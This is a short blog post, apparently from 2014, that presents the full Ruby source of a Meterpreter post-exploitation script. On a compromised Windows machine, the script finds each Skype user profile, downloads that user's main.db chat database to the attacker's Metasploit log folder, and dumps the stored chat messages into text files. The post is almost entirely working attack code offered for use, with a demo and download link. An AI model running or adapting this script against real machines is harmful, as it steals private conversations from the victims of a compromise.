terça-feira, 11 de março de 2014

Meterpreter Script (Skype_db)

Using this script you can download the main.db file of skype users , and extract the talks into txt file.
Tested on: Windows 8 and Windows 7
Youtube Demo
Script: Github
#
# Script to extract skype logs :-)
# Author: MMxM ( hc0der.blogspot.com )
#

require 'date'

begin
 require 'sqlite3'
rescue LoadError
 print_error("You must have installed sqlite3 gem to script work !")
 raise Rex::Script::Completed
end

def show_help(opts)
 print_line("\nDESCRIPTION:")
 print_line("\n\tScript For Download main.db of skype")
 print_line("\tAnd Extract Talk History")
 print_line(opts.usage)
end

opts = Rex::Parser::Arguments.new(
 "-h" => [ false, "Display This help menu" ],
 "-l" => [ true, "Set Custom Location of Skype to Extract Data From Users" ]
)

location = false

opts.parse(args) { |opt, idx, val|
 case opt
  when "-h"
   show_help(opts)
   raise Rex::Script::Completed
  when "-l"
   location = val
 end
}

if location == false
 location = client.fs.file.expand_path("%APPDATA%")+"\\Skype"
end

stat = client.fs.file.stat(location) rescue nil

if stat == nil
 print_error("Directory: #{location} not found !")
 print_error("You can set manually skype path , using opt -l")
 raise Rex::Script::Completed
else
 print_status("Extracting Users from #{location}")
end

users = []

client.fs.dir.foreach(location) do |us|
 users << us if us !~ /^(\.|\.\.|Content|DataRv|My Skype Received Files|Pictures|shared_dynco|shared_httpfe|shared.xml|dns.ldb|shared.lck)$/
end

if users.any? == false
 print_error("No Users Found")
 raise Rex::Script::Completed
end

@info = client.sys.config.sysinfo

print_status("#{users.count} User(s) Found !")
print_status("#{users.join(", ")}")

success_down = {}
users.each do |id|
 print_status("Downloading main.db from user #{id}")
 file_name = location+"\\"+id+"\\main.db"
 stat = client.fs.file.stat(file_name) rescue nil

 if stat == nil
  print_error("File Not Found (#{file_name})")
  next
 end

 @output_dir = File.join(Msf::Config.log_directory, "scripts", "skype_history", Rex::FileUtils.clean_path(@info['Computer']), Time.now.strftime("%Y%m%d.%H%M"))
 ::FileUtils.mkdir_p(@output_dir)
 final = File.join(@output_dir, Rex::FileUtils.clean_path(id), "main.db")
 client.fs.file.download_file(final, file_name)
 print_status("Saving file to #{final}")
 success_down[:"#{id}"] = final
end

if success_down.any? == false
 print_status("100% complete")
 raise Rex::Script::Completed
end

print_good("Download Stage Terminated")
print_good("Now Extracting Data Into txt File")

success_down.each do |user,log_file|
 print_status("Extracting data from #{user}")

begin
 txt_log_file = log_file+".txt"
 txt_file = File.new(txt_log_file,"a+")
 print_status("Txt Output Location: #{txt_log_file}")
 db = SQLite3::Database.open log_file
 stm = db.prepare "SELECT timestamp,author,from_dispname,body_xml,chatname FROM Messages WHERE type='61' order by timestamp"
 rs = stm.execute
 rs.each do |row|
  txt_file.puts Time.at(row[0]).to_s+" "+row[1]+"("+row[2]+")"+": "+row[3]+" ("+row[4]+")"
 end

rescue SQLite3::Exception => e
 print_error("Exception occured: #{e}")
ensure
 stm.close if stm
 db.close if db
  txt_file.close
end
end

print_status("100% complete")
raise Rex::Script::Completed

Nenhum comentário:

Postar um comentário